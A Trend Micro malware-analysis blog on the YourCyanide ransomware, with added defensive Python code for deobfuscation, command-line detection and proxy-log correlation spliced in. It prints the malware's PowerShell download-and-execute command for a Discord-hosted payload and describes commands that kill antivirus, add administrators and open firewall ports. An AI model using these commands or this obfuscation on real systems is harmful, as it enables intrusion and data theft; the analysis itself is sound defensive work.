YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation
The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number of capabilities, such as stealing user information, enabling remote desktop connections, and propagating through email and physical drives.
In this blog entry, we will analyze YourCyanide, the latest variant of the CMD-based ransomware family that started with GonnaCope. YourCyanide is a sophisticated ransomware that integrates PasteBin, Discord, and Microsoft document links as part of its payload download routine. YourCyanide contains multiple layers of obfuscation and takes advantage of custom environment variables and the Enable Delayed Expansion function to hide its activities. As part of its evasion strategy, YourCyanide will also pass through different files, downloading the succeeding files via Discord and Pastebin with each step before eventually downloading the main payload.
Note that the ransomware is still currently under development, so some portions of the routine — like the actual encryption portion — are not finalized (YourCyanide currently renames the files under specific directories, but does not encrypt anything).
The earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This variant possessed the ability to overwrite its victim's files — however, this was limited to the current directory in which the ransomware was being executed.
Upon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in the compromised network notifying them of the infiltration. Along with this, another message was sent stating that "Kekware and Kekpop were just the begining" — indicating that the author was preparing a more sophisticated variant of the original ransomware.
Table 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.
| Date earliest sample was uploaded to VirusTotal | Ransomware sample |
| --- | --- |
| 07 Apr 2022 | GonnaCope |
| 07 May 2022 | Kekpop |
| 11 May 2022 | Kekware |
| 13 May 2022 | YourCyanide |
Table 1. CMD-based ransomware samples and their date of upload to VirusTotal
YourCyanide technical analysis
YourCyanide initially arrives as an LNK file whose target is the following PowerShell command, which downloads the 64-bit executable YourCyanide.exe from Discord and runs it:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')"; start YourCyanide.exe"
This 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.
The dropped YourCyanide.cmd in turn downloads a further script from Pastebin and saves it under the same filename (YourCyanide.cmd).
The ransomware will create a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce for cleanup purposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader from the machine.
The downloaded script contains 10 layers of obfuscated code, each of which has to be run to deobfuscate the next. It relies on command extensions and delayed expansion (setlocal EnableExtensions EnableDelayedExpansion), which causes variables referenced as !VAR! to be expanded when each line executes rather than when the line is parsed.
The malware's obfuscation is built on the CMD substring syntax:
%parameter:~index,count%
This returns count characters of the variable's value, starting at the zero-based index. For example, %Kesik:~19,1% returns the single character at index 19 of the variable Kesik; fragments like this are concatenated to rebuild each command at run time.
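To make the substring trick concrete, here is an added Python resolver (example code, not part of the Trend Micro analysis or the malware) that applies the %VAR:~index,count% and !VAR:~index,count! rules statically, layer by layer, to a constructed batch fragment. The variable name Kesik comes from the text; its value, the indices and the resulting command are made up for the demonstration.

```python
"""Static resolver for cmd.exe substring expansions (%VAR:~start,len%).

Added example, not code from the Trend Micro write-up or the malware. The
sample script at the bottom is constructed; only the variable name Kesik is
taken from the article.
"""
import re

# %VAR%, %VAR:~start%, %VAR:~start,len% and the delayed-expansion forms with '!'.
# Group 1 is the opening delimiter; the closing delimiter must be the same one.
_EXPANSION = re.compile(
    r"([%!])(?P<name>[A-Za-z_][A-Za-z0-9_]*)"
    r"(?::~(?P<start>-?\d+)(?:,(?P<len>-?\d+))?)?\1"
)
# set NAME=value  /  set "NAME=value"  (one assignment per line)
_SET = re.compile(r'^\s*set\s+"?(?P<name>[A-Za-z_][A-Za-z0-9_]*)=(?P<val>[^"\r\n]*)"?\s*$',
                  re.IGNORECASE | re.MULTILINE)


def cmd_substring(value, start, length=None):
    """Slice `value` with cmd.exe's rules: a negative start counts from the end,
    a negative length stops that many characters before the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        return value[start:]
    if length < 0:
        return value[start:n + length]
    return value[start:start + length]


def resolve_layer(text, env):
    """Replace every expansion whose variable is known in `env`; leave the rest
    untouched so the analyst can see what is still unresolved."""
    def repl(m):
        key = m.group("name").upper()          # cmd variable names are case-insensitive
        if key not in env:
            return m.group(0)
        length = m.group("len")
        return cmd_substring(env[key], int(m.group("start") or 0),
                             None if length is None else int(length))
    return _EXPANSION.sub(repl, text)


def harvest_sets(text, env):
    """Record `set NAME=value` assignments in script order, resolving each value
    against the variables defined before it (later layers are built from earlier ones)."""
    for m in _SET.finditer(text):
        env[m.group("name").upper()] = resolve_layer(m.group("val"), env)
    return env


def deobfuscate(script, max_layers=10):
    """Peel expansion layers until the script stops changing."""
    env = {}
    for _ in range(max_layers):
        harvest_sets(script, env)
        resolved = resolve_layer(script, env)
        if resolved == script:
            break
        script = resolved
    return script


def extract_commands(script):
    """Return the deobfuscated lines that are not bookkeeping (set/setlocal/echo/rem)."""
    skip = re.compile(r"^\s*(?:@?echo\b|setlocal\b|set\s|rem\b|::)", re.IGNORECASE)
    return [ln.strip() for ln in deobfuscate(script).splitlines()
            if ln.strip() and not skip.match(ln)]


# Constructed sample in the style the article describes (not the real script).
# Kesik = "xnQe7tZ soprkJ": index 1 = n, 3 = e, 5 = t, 7 = space, 8 = s, 9 = o, 10 = p, 11 = r
SAMPLE = """@echo off
setlocal EnableDelayedExpansion
set "Kesik=xnQe7tZ soprkJ"
set "a=%Kesik:~1,1%%Kesik:~3,1%%Kesik:~5,1%"
set "b=%Kesik:~8,1%%Kesik:~5,1%%Kesik:~9,1%%Kesik:~10,1%"
set "c=%Kesik:~1,1%%Kesik:~9,1%%Kesik:~11,1%%Kesik:~5,1%%Kesik:~9,1%%Kesik:~1,1%"
%a%%Kesik:~7,1%%b%%Kesik:~7,1%!c!
"""

if __name__ == "__main__":
    print(extract_commands(SAMPLE))   # ['net stop norton']
```

Resolving %...% and !...! the same way is a simplification: cmd.exe expands %VAR% when a line is parsed and !VAR! when it executes, which matters for variables reassigned inside a loop or a parenthesised block. For a static pass over a dropped script that difference rarely changes the result, and unresolved references are left in place so you can see which layer still needs a variable.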
Upon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command Prompt windows.
It will then try to add a user "session" to the Administrators group using the net localgroup command.
It also creates an autostart mechanism for persistence by creating a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and then copying itself to the Startup directory. It also disables Task Manager by modifying its registry entry.
It then checks if %SystemDrive%\AutoExec.bat exists, and if so, it deletes the original and then copies itself and sets the file to read only, hidden, and as a system file.
It also avoids machines with the following usernames, some of which, according to our research, are usernames used by malware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:
- a.monaldo
- George
- george
- help
- karolisliucveikis
- Soumy
- guent
After checking the username of the infected machine, it drops and executes a batch file at %UserProfile%\Documents\black.bat. This batch file continuously opens the Blank Screen Saver, which renders the machine unusable while the malware is running.
YourCyanide also terminates several services and security applications by concatenating variables to form the strings "net stop," "norton," "symantec," and "McAfee."
It then swaps the mouse button using the SwapMouseButton Export function of the user32.dll file.
After terminating applications, it renames the files in the following directories to <random number>.<file extension>.<random number>.cyn and overwrites their contents with a random number generated through the CMD shell's built-in %random% variable:
- %MyDesktop%
- %MyDocuments%
- %MyMusic%
- %MyPictures%
- %MyVideos%
- %Downloads%
Although no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed — especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still currently under development, it’s likely that the malware authors are still finalizing the encryption portion of the routine.
It then creates the following ransom notes and drops them into %MyDesktop%:
- YcynNote.txt
- other.txt
It features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to win.ini and system.ini.
After performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for rendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening.
YourCyanide is also capable of spreading via email and to different drives. It creates two VBScript files, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):
- I Have a crush on you
- Check This Out
It then copies itself to the following drives or directories:
- D:
- E:
- F:
- G:
- H:
- %UserProfile%
YourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18.
The ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections via the netsh advfirewall function.
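The host-side behaviours described above (adding a local administrator, Run/RunOnce persistence, disabling Task Manager, hiding the file with attrib, the SwapMouseButton call, stopping AV services, and the netsh firewall and RDP changes) all show up as child processes of the cmd.exe that interprets the script. The following is an added Python example, not code from the Trend Micro write-up, that scores Sysmon-style process-creation events per parent process. The command lines are constructed in the usual form for each action; the article does not quote the malware's exact commands (the RDP-related netsh command in Figure 18 is not reproduced here), so treat the patterns as starting points to tune against real telemetry.

```python
"""Score YourCyanide-style host behaviours from process-creation events.

Added example, not from the Trend Micro write-up. Events and command lines are
constructed; the regexes encode the common command-line form of each action.
"""
import re
from collections import defaultdict

RULES = {
    "local_admin_add": r'\bnet(?:1|\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b',
    "persist_run_key": r'\breg(?:\.exe)?\s+add\s+"?hk(?:lm|cu)\\software\\microsoft\\windows\\currentversion\\run(?:once)?\b',
    "disable_taskmgr": r'\bdisabletaskmgr\b',
    "hide_file":       r'\battrib(?:\.exe)?\s+(?:\+[hsr]\s+){2,}',
    "swap_mouse":      r'\brundll32(?:\.exe)?\s+user32(?:\.dll)?\s*,\s*swapmousebutton\b',
    "fw_rule_add":     r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b',
    # Assumed form of the RDP enablement; the article only says netsh is used.
    "rdp_fw_group":    r'\bnetsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="remote desktop"\s+new\s+enable=yes\b',
    "stop_av_service": r'\bnet(?:1|\.exe)?\s+stop\s+"?[^"]*?(?:norton|symantec|mcafee)',
}
_COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}


def match_rules(cmdline):
    """Return the set of rule names whose pattern matches one command line."""
    return {name for name, rx in _COMPILED.items() if rx.search(cmdline)}


def detect(events, threshold=3):
    """Group hits by parent process (the cmd.exe interpreting the script) and
    report parents showing at least `threshold` distinct behaviours.
    Returns {ppid: sorted list of rule names}."""
    per_parent = defaultdict(set)
    for ev in events:
        per_parent[ev["ppid"]] |= match_rules(ev["cmdline"])
    return {ppid: sorted(hits) for ppid, hits in per_parent.items()
            if len(hits) >= threshold}


# Constructed events (not real telemetry). ppid 3988 is a cmd.exe running the
# script; ppid 1200 and 2222 are unrelated processes doing one-off legitimate things.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3988, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup Administrators session /add"},
    {"pid": 4124, "ppid": 3988, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d "C:\Users\victim\YourCyanide.cmd" /f'},
    {"pid": 4128, "ppid": 3988, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"},
    {"pid": 4132, "ppid": 3988, "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r'attrib +h +s "C:\Users\victim\YourCyanide.cmd"'},
    {"pid": 4136, "ppid": 3988, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe user32.dll,SwapMouseButton"},
    {"pid": 4140, "ppid": 3988, "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net stop "Norton Security"'},
    {"pid": 4144, "ppid": 3988, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"pid": 4148, "ppid": 3988, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="open" dir=in action=allow protocol=TCP localport=3389'},
    {"pid": 5100, "ppid": 1200, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="MyApp" dir=in action=allow protocol=TCP localport=8080'},
    {"pid": 5200, "ppid": 2222, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Program Files\App\upd.exe" /f'},
]

if __name__ == "__main__":
    for ppid, hits in detect(SAMPLE_EVENTS).items():
        print(ppid, hits)
```

Scoring per parent process rather than per command is what keeps false positives manageable: an installer that adds one firewall rule or one Run key registers a single behaviour and stays below the threshold, while a script that performs several of these in a row from the same cmd.exe stands out even though each command on its own is routine administration.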
It then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.
The ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine. Like the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its autostart mechanism by producing a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by copying itself to the Startup directory.
The malware uses the Telegram chatbot API to exfiltrate the stolen information and stores the API endpoint in a variable named "Webhook".
It downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt, which contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.
It also collects the following machine information and stores it in userdata.txt:
- IP addresses
- MAC addresses
- CPU Information
- Memory Size
- Partition information
- System specifications
- OS product key
- Currently running processes
Both the token dump and userdata.txt are then sent through the Telegram chatbot API using the curl command.
We also discovered that YourCyanide exfiltrates Minecraft-related credentials.
Finally, it downloads another executable from Google Docs and executes it with the parameter "/stext ForMe.txt"; ForMe.txt is then sent to the Telegram chatbot. The Google Docs link is no longer accessible, so that sample could not be sourced, but it is launched with the same parameter as the sample passwords.exe, which the earlier Kekpop variant also uses. "/stext" is the NirSoft command-line switch for saving a tool's output as a plain-text file, used by tools such as WebBrowserPassView, which recovers credentials stored by web browsers such as Internet Explorer (versions 4.0 to 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.
The file created from executing passwords.exe contains saved passwords that are stored in Google Chrome.
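The download chain (Discord CDN, Pastebin raw) and the Telegram Bot API exfiltration described above can also be recovered from web-proxy logs. The following is an added Python example, not part of the Trend Micro write-up, that classifies constructed proxy log lines by stage and raises the severity only when a client fetches a payload and then posts to api.telegram.org shortly afterwards. Hostnames and URL shapes are the public endpoints of those services; the attachment IDs, paste IDs, client IPs and the bot token are invented.

```python
"""Correlate payload downloads with Telegram Bot API posts in proxy logs.

Added example, not from the Trend Micro write-up. SAMPLE_LOG is constructed:
the hosts and URL shapes are the real public endpoints, everything else is made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed log lines: "<ISO time> <client ip> <method> <url> <status>"
SAMPLE_LOG = """\
2022-05-16T10:02:11Z 10.0.0.21 GET https://cdn.discordapp.com/attachments/1111/2222/YourCyanide.exe 200
2022-05-16T10:02:15Z 10.0.0.21 GET https://pastebin.com/raw/AbCdEfGh 200
2022-05-16T10:03:05Z 10.0.0.21 GET https://cdn.discordapp.com/attachments/1111/3333/GetToken.exe 200
2022-05-16T10:03:30Z 10.0.0.21 POST https://api.telegram.org/bot123456789:AAExampleTokenValue/sendDocument 200
2022-05-16T10:03:31Z 10.0.0.21 POST https://api.telegram.org/bot123456789:AAExampleTokenValue/sendDocument 200
2022-05-16T11:15:00Z 10.0.0.42 GET https://cdn.discordapp.com/attachments/4444/5555/holiday.png 200
2022-05-16T11:16:00Z 10.0.0.42 GET https://pastebin.com/raw/QwErTy12 200
"""

# (stage, host pattern, path pattern). Only script/executable attachments on the
# Discord CDN count as a download stage; image attachments are everyday traffic.
STAGES = [
    ("discord_payload", re.compile(r"^cdn\.discordapp\.com$"),
     re.compile(r"^/attachments/\d+/\d+/[^/]+\.(?:exe|cmd|bat|vbs|lnk|ps1)$", re.I)),
    ("pastebin_raw", re.compile(r"^pastebin\.com$"), re.compile(r"^/raw/[A-Za-z0-9]+$")),
    ("telegram_bot", re.compile(r"^api\.telegram\.org$"),
     re.compile(r"^/bot\d+:[A-Za-z0-9_-]+/(?:sendDocument|sendMessage)$")),
]
_TOKEN = re.compile(r"/bot(\d+:[A-Za-z0-9_-]+)/")
DOWNLOAD_STAGES = {"discord_payload", "pastebin_raw"}


def parse_line(line):
    ts, client, method, url, status = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client, "method": method, "url": url, "status": int(status)}


def classify(url):
    """Return the stage name for a URL, or None if it matches no stage."""
    parts = urlsplit(url)
    for stage, host_rx, path_rx in STAGES:
        if host_rx.match(parts.hostname or "") and path_rx.match(parts.path):
            return stage
    return None


def extract_bot_token(url):
    """The bot token in the URL is the operator's credential; keep it as evidence."""
    m = _TOKEN.search(url)
    return m.group(1) if m else None


def redact(url):
    """Mask the token before the URL goes into an alert or ticket."""
    return _TOKEN.sub("/bot<redacted>/", url)


def correlate(log_text, window=timedelta(minutes=15)):
    """Per client: stages seen, and 'high' severity when a download stage is
    followed by a Telegram Bot API post within `window`, otherwise 'low'."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        stage = classify(ev["url"])
        if stage:
            events[ev["client"]].append((ev["ts"], stage, redact(ev["url"])))
    report = {}
    for client, hits in events.items():
        hits.sort()
        downloads = [ts for ts, stage, _ in hits if stage in DOWNLOAD_STAGES]
        chained = any(stage == "telegram_bot"
                      and any(timedelta(0) <= ts - d <= window for d in downloads)
                      for ts, stage, _ in hits)
        report[client] = {"severity": "high" if chained else "low",
                          "stages": sorted({stage for _, stage, _ in hits}),
                          "urls": [u for _, _, u in hits]}
    return report


if __name__ == "__main__":
    for client, info in correlate(SAMPLE_LOG).items():
        print(client, info["severity"], info["stages"])
```

Two points matter in practice. Discord attachments and Pastebin pastes are ordinary traffic, so a single hit is at most a lead; the correlation is what turns it into an alert. And the token embedded in the Telegram URL is the operator's bot credential: record it as evidence and redact it from anything that leaves the investigation, as the code does before building the report.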
Avoiding usernames
Of the usernames this malware avoids, three in particular stand out. Namely: a.monaldo, karolisliucveikis, and soumy. Upon further research, we discovered that these are usernames from sandbox environments.
The username of the sandbox machine used by Hunter Yomi
The username of the sandbox machine used by PCRisk
Variant Comparison
The team analyzed these CMD-based ransomware variants and compiled the following table comparing them. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web browsers or a list of installed applications, and does not enable RDP connections. It also does not execute black.bat, the file that temporarily renders the machine unusable while the payload runs. The BTC address used by GonnaCope differs from the one shared by the later variants, and its ransom note has a different format. The variants also differ in delivery, arriving variously as an archive, an executable, or an LNK file that drops the CMD-based ransomware. The payloads sit at different points in the chain as well: some are in the main CMD file, others in files downloaded from Pastebin and Discord.
| Behavior | GonnaCope | Kekware | Kekpop | YourCyanide |
| --- | --- | --- | --- | --- |
| Creates auto-start mechanism | Yes | Yes | Yes | Yes |
| Disables Task Manager | Yes | Yes | Yes | Yes |
| Checks the username of the machine | No | Yes | Yes | Yes |
| Creates and executes black.bat to continuously turn on the Blank Screen Saver | No | Yes | Yes | Yes |
| Stops services | Yes | Yes | Yes | Yes |
| Terminates applications | Yes | Yes | Yes | Yes |
| Swaps mouse buttons | Yes | Yes | Yes | Yes |
| Renames files | GonnaCope.cope | <Random>.<file extension>.<Random>.cyn | <Random>.<file extension>.<Random>.kekpop | <Random>.<file extension>.<Random>.cyn |
| Gathers a list of installed applications | No | Yes | Yes | Yes |
| Collects machine information | Yes | Yes | Yes | Yes |
| Collects token access data | Yes | Yes | Yes | Yes |
| Collects passwords saved in web browsers | No | Yes | Yes | Yes |
| Sends an email with a copy of itself as an attachment | Yes | Yes | Yes | Yes |
| Subject of sent email | Is this you? | I Have a crush on you | I Have a crush on you | I Have a crush on you |
| Copies itself to drives | Yes | Yes | Yes | Yes |
| Enables RDP connection | No | Yes | Yes | Yes |
| Ransom note message | Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key | Q: What happened to my files | Q: What happened to my files? Q: how can i get them back? Q: What happens if i dont pay? Q: Is this related to kpop? | Q: What happened to my files? |
| Other messages | | | kekpop is on your network | Kekware and kekpop were just the beginning |
| BTC wallet used | bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf |
Conclusion
The heavy obfuscation of these scripts keeps detection rates for these CMD-based ransomware variants very low, which makes compromising victims' machines easier. The technique is not new, but multilayer obfuscation built from custom environment variables remains highly effective at evading detection. These variants can also download multiple payloads, spread via email, and stage files on Discord, Pastebin, and even Microsoft document links.
From our analysis, we are able to infer that the malware author is actively monitoring the reports created by malware researchers by taking note of the usernames found in their sandbox logs and reports, and including them in the evasion list of usernames and machines that is part of the initialization process of the malware being used.
Ransomware variants with multiple capabilities, such as the one analyzed in this blog entry, are gaining popularity. While YourCyanide and its sibling variants are currently not as impactful as other families, they represent an interesting update to ransomware kits, bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework.
It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.
Trend Micro solutions
A multilayered approach can help organizations defend against ransomware attacks using security technologies that can detect malicious components and suspicious behavior.
- Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block suspicious behavior and tools before the ransomware can do any damage.
- Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning.
- Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware.
- Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection.
Indicators of Compromise
GONNACOPE

| File | SHA256 | Detection |
| --- | --- | --- |
| GonnaCope.Bat | ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968 | Trojan.BAT.GONNACOPE.A |
| GonnaCope.Bat | 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122 | Trojan.BAT.GONNACOPE.THEOEBB |
| GonnaCopeDL | f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3 | Trojan.MSIL.GONNACOPE.A |
| GonnaCopeCryptor | 2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280 | Ransom.MSIL.GONNACOPE.YXCEE |
| GonnaCope | 7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7 | TrojanSpy.MSIL.GONNACOPE.A |
| GonnaCopeRansNote | 7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374 | Ransom.MSIL.GONNACOPE.A.note |
| mail.vbs | 26bde18048c32f6612d8d76b8696b2ce59db227913dccd51f696b51640ee11e9 | Worm.VBS.GONNACOPE.A |
| msg.vbs | ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a | PUA.VBS.GonnaLoop.A |
| msgbox.vbs | d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54 | PUA.VBS.GonnaLoop.A |
| nokeyboard.reg | a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e | PUA.Win32.Disabler.A |
| Readme.txt | 9c39b7535b527df3b70800562bad98dc2e046de321fe3914dab896eda753cf38 | Ransom.Win32.GONNACOPE.YXCEW.note |
| downloader.vbs | 45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083 | Trojan.VBS.GONNACOPE.A |
KEKPOP

| File | SHA256 | Detection |
| --- | --- | --- |
| Arrival | c8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262 | Trojan.BAT.KEKPOP.THEACBB |
| | 296ba1469d072c37c6361fe80ba396a92f6461b9562103a3b5a20841d0757722 | |
| Main File | bfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f | Ransom.BAT.KEKPOP.THEAABB |
| | f8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d | |
| | 1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54 | |
| | d2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56 | |
| Dropped BAT File 1 | | Trojan.BAT.KEKPOP.THEACBB |
| Dropped BAT File 2 | 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 | TrojanSpy.BAT.KEKPOP.THEACBB |
| Dropped BAT File 3 | 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b | Trojan.BAT.KEKPOP.THEACBB |
| Dropped Text File | | Ransom.BAT.KEKPOP.THEACBB.note |
| Dropped HTML File | | Ransom.HTML.KEKPOP.THEACBB.note |
| Passwords.exe | 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 | HackTool.Win32.NirsoftPT.SM |
| GetToken.exe | 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 | Trojan.MSIL.TOKENSTEALER.YXCES |
| kekpopdicord.exe | e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913 | Trojan.Win64.KEKPOP.YXCET |
| | | Trojan.BAT.KEKPOP.YXCEZ |
KEKWARE

| File | SHA256 | Detection |
| --- | --- | --- |
| Arrival | 3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259 | Trojan.PS1.KEKPOP.YXCEST |
| | 23269070507a70c34a4e219f9be19943211ed38eec4a9ce2b3a49bf76676a5e3 | Trojan.PS1.KEKPOP.YXCEST |
| Main File | e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78 | Trojan.BAT.KEKPOP.YXCEST |
| YcynNote.txt | 602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc | Ransom.BAT.KEKPOP.YXCEST.note |
| rAndom.cmd | 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b | Trojan.BAT.KEKPOP.THEACBB |
| cynlog.cmd | 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 | TrojanSpy.BAT.KEKPOP.THEACBB |
| Passwords.exe | 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 | HackTool.Win32.NirsoftPT.SM |
| GetToken.exe | 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 | Trojan.MSIL.TOKENSTEALER.YXCES |
| black.bat | 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 | Trojan.BAT.KEKPOP.YXCEST |
| loveletter.vbs | f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 | Worm.VBS.MASSMAIL.YXCEST |
| mail.vbs | 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 | Worm.VBS.MASSMAIL.YXCEST |
| fasdgfsdga.cmd | 56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83 | Trojan.BAT.POWLOAD.TIAOELC |
YOURCYANIDE

| File | SHA256 | Detection |
| --- | --- | --- |
| LNK | 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad | Trojan.LNK.KEKPOP.YXCEST |
| | 9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe | Trojan.LNK.KEKPOP.YXCERT |
| | c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 | Trojan.LNK.KEKPOP.YXCERT |
| | f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649 | Trojan.LNK.KEKPOP.YXCERT |
| Win64 EXE Dropper | 8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669 | Trojan.Win64.KEKPOP.YXCEST |
| | d51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c | Trojan.Win64.KEKPOP.YXCERT |
| | 6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e | Trojan.Win64.KEKPOP.YXCERT |
| | 2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3ce3f8 | Trojan.Win64.KEKPOP.YXCERT |
| | a180c31666788fb6a7da421a743bb1c487099297ec06f2bdd841f342021f3763 | Trojan.Win64.KEKPOP.YXCERT |
| Downloader of the payload | b43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace | Trojan.PS1.KEKPOP.YXCEST |
| | 6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25 | Trojan.LNK.KEKPOP.YXCERT |
| Main File (YourCyanide.cmd) | 6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 | Trojan.BAT.KEKPOP.AB |
| | f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 | Ransom.BAT.KEKPOP.YXCERT |
| | 8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 | Ransom.BAT.KEKPOP.YXCERT |
| | 67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf | Ransom.BAT.KEKPOP.YXCERT |
